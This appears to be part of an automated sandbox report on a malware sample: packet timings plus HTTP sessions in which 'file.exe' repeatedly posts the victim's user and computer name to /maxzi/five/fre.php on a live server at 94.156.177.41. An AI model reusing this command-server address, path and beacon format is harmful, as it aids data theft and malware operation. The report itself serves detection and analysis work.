                                                                          Nov 22, 2024 17:39:50.770690918 CET804991394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:50.770804882 CET4991380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:50.772958040 CET4991380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:50.892405033 CET804991394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:50.892508984 CET4991380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:51.012083054 CET804991394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:52.341576099 CET804991394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:52.341768980 CET804991394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:52.341897011 CET4991380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:52.341897011 CET4991380192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:52.461464882 CET804991394.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:52.500437021 CET4991780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:52.620732069 CET804991794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:52.620826006 CET4991780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:52.622878075 CET4991780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:52.742398977 CET804991794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:52.742489100 CET4991780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:52.862409115 CET804991794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:54.151818037 CET804991794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:54.151843071 CET804991794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:54.151906967 CET4991780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:54.151931047 CET4991780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:54.273216963 CET804991794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:54.290039062 CET4992280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:54.409564972 CET804992294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:54.409774065 CET4992280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:54.411840916 CET4992280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:54.532161951 CET804992294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:54.532238007 CET4992280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:54.655554056 CET804992294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:55.765755892 CET804992294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:55.765846014 CET804992294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:55.765985012 CET4992280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:55.766098022 CET4992280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:55.885986090 CET804992294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:55.910949945 CET4992680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:56.031737089 CET804992694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:56.031858921 CET4992680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:56.034006119 CET4992680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:56.154486895 CET804992694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:56.154638052 CET4992680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:56.274411917 CET804992694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:57.516748905 CET804992694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:57.516896963 CET804992694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:57.517014980 CET4992680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:57.636701107 CET804992694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:57.660712004 CET4993280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:57.781261921 CET804993294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:57.781424046 CET4993280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:57.783540010 CET4993280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:57.905011892 CET804993294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:57.905220985 CET4993280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:58.024755955 CET804993294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:59.228705883 CET804993294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:59.228878975 CET4993280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:59.228926897 CET804993294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:59.228987932 CET4993280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:59.348826885 CET804993294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:59.371396065 CET4993780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:59.492074966 CET804993794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:59.492219925 CET4993780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:59.497380018 CET4993780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:59.617477894 CET804993794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:39:59.617554903 CET4993780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:39:59.737829924 CET804993794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:01.069856882 CET804993794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:01.069950104 CET804993794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:01.069977999 CET4993780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:01.070010900 CET4993780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:01.189433098 CET804993794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:01.218647003 CET4994280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:01.338296890 CET804994294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:01.338401079 CET4994280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:01.341367960 CET4994280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:01.461124897 CET804994294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:01.461226940 CET4994280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:01.580817938 CET804994294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:02.745074987 CET804994294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:02.745093107 CET804994294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:02.745173931 CET4994280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:02.745208979 CET4994280192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:02.878787994 CET4994580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:02.986093044 CET804994294.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:02.998406887 CET804994594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:02.998523951 CET4994580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:03.000669003 CET4994580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:03.120337009 CET804994594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:03.120404959 CET4994580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:03.240005016 CET804994594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:04.526101112 CET804994594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:04.526233912 CET804994594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:04.526328087 CET4994580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:04.526328087 CET4994580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:04.646102905 CET804994594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:04.665785074 CET4995180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:04.785433054 CET804995194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:04.785701036 CET4995180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:04.788348913 CET4995180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:04.910341978 CET804995194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:04.910449982 CET4995180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:05.030009985 CET804995194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:06.269392967 CET804995194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:06.269452095 CET804995194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:06.269586086 CET4995180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:06.269684076 CET4995180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:06.389791012 CET804995194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:06.409576893 CET4995780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:06.529684067 CET804995794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:06.529804945 CET4995780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:06.531886101 CET4995780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:06.653244972 CET804995794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:06.653373957 CET4995780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:06.773073912 CET804995794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:08.104639053 CET804995794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:08.104744911 CET804995794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:08.104775906 CET4995780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:08.104819059 CET4995780192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:08.225754976 CET804995794.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:08.237373114 CET4996180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:08.357147932 CET804996194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:08.357280016 CET4996180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:08.359375000 CET4996180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:08.480283976 CET804996194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:08.480379105 CET4996180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:08.599953890 CET804996194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:09.891527891 CET804996194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:09.891618013 CET804996194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:09.891748905 CET4996180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:09.891750097 CET4996180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:10.011539936 CET804996194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:10.039467096 CET4996580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:10.159194946 CET804996594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:10.159285069 CET4996580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:10.162188053 CET4996580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:10.283293962 CET804996594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:10.283380032 CET4996580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:10.402885914 CET804996594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:11.557749987 CET804996594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:11.557939053 CET4996580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:11.557984114 CET804996594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:11.558062077 CET4996580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:11.677531004 CET804996594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:11.698425055 CET4997080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:11.818003893 CET804997094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:11.818142891 CET4997080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:11.820862055 CET4997080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:11.940304041 CET804997094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:11.940390110 CET4997080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:12.059907913 CET804997094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:13.393899918 CET804997094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:13.393992901 CET804997094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:13.394136906 CET4997080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:13.394186020 CET4997080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:13.513835907 CET804997094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:13.538705111 CET4997680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:13.658473015 CET804997694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:13.658709049 CET4997680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:13.660808086 CET4997680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:13.780323029 CET804997694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:13.780404091 CET4997680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:13.901499033 CET804997694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:15.065463066 CET804997694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:15.065615892 CET804997694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:15.065651894 CET4997680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:15.065686941 CET4997680192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:15.188462973 CET804997694.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:15.213808060 CET4998180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:15.333775997 CET804998194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:15.333883047 CET4998180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:15.336205959 CET4998180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:15.455688000 CET804998194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:15.455771923 CET4998180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:15.575445890 CET804998194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:16.777442932 CET804998194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:16.777518034 CET804998194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:16.777601004 CET4998180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:16.777636051 CET4998180192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:16.897699118 CET804998194.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:16.923423052 CET4998480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:17.042998075 CET804998494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:17.044049025 CET4998480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:17.046169043 CET4998480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:17.165817976 CET804998494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:17.167830944 CET4998480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:17.287533998 CET804998494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:18.529325008 CET804998494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:18.529454947 CET4998480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:18.529480934 CET804998494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:18.529545069 CET4998480192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:18.649027109 CET804998494.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:18.682302952 CET4999080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:18.802068949 CET804999094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:18.802206993 CET4999080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:18.804296017 CET4999080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:18.923772097 CET804999094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:18.923856974 CET4999080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:19.043404102 CET804999094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:20.330070019 CET804999094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:20.330144882 CET804999094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:20.330214024 CET4999080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:20.331954002 CET4999080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:20.449795961 CET804999094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:20.630951881 CET4999580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:20.750711918 CET804999594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:20.750821114 CET4999580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:20.753468990 CET4999580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:20.873039007 CET804999594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:20.873101950 CET4999580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:20.994288921 CET804999594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:22.279743910 CET804999594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:22.279778004 CET804999594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:22.279855967 CET4999580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:22.279881001 CET4999580192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:22.401026964 CET804999594.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:22.427679062 CET5000080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:22.547498941 CET805000094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:22.547760010 CET5000080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:22.549735069 CET5000080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:22.672595978 CET805000094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:22.672655106 CET5000080192.168.2.494.156.177.41
                                                                          Nov 22, 2024 17:40:22.794616938 CET805000094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:24.138025999 CET805000094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:24.138267040 CET805000094.156.177.41192.168.2.4
                                                                          Nov 22, 2024 17:40:24.138359070 CET5000080192.168.2.494.156.177.41
                                                                          • 94.156.177.41
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.44973394.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:20.262320042 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 176
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:20.385793924 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: 'ckav.rujones367706JONES-PCk0FDD42EE188E931437F4FBE2CDUov1
                                                                          Nov 22, 2024 17:38:21.672959089 CET185INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:21 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.44973594.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:21.933479071 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 176
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:22.053196907 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: 'ckav.rujones367706JONES-PC+0FDD42EE188E931437F4FBE2CzzS2C
                                                                          Nov 22, 2024 17:38:23.332376003 CET185INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:23 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.44973694.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:23.543745041 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:23.667762995 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:24.937561989 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:24 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.44973894.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:25.299732924 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:25.419739008 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:26.772850990 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:26 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.44973994.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:27.059416056 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:27.183871984 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:28.639436007 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:28 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.44974094.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:28.914505005 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:29.035149097 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:30.444330931 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:30 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.44974194.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:30.724769115 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
